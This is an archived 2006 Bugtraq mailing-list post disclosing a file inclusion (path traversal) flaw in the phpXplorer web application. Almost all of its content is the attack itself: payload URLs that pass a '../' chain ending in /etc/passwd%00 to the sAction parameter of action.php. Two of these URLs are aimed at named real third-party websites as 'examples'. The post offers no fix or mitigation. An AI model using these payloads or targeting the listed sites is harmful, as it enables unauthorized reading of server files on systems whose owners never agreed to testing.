lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060118002249.1342.qmail@securityfocus.com> Date: 18 Jan 2006 00:22:49 -0000 From: liz0@...mail.com To: bugtraq@...urityfocus.com Subject: phpXplorer file inclusion biyosecurity.be site:www.phpxplorer.org ------------------------------------------------ http://victim/folder/system/action.php?sShare=guest&sAction=../../../../../../../../../../../../etc/passwd%00 ------------------------------------------------- example: http://fta.lv/phpXplorer/system/action.php?sShare=guest&sAction=../../../../../../../../../../../../etc/passwd%00 http://lasersprint.com/phpXplorer/system/action.php?sShare=guest&sAction=../../../../../../../../../../../../etc/passwd%00 ------------------------------------------------ Credit:Liz0ziM&Cyberlord biyosecurity.be ------------------------------------------------- source: http://www.blogcu.com/Liz0ziM/200529/